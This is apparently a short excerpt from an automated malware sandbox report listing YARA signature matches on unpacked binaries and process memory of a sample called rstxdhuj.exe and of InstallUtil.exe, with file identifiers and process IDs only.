Source: Yara match File source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4684, type: MEMORYSTR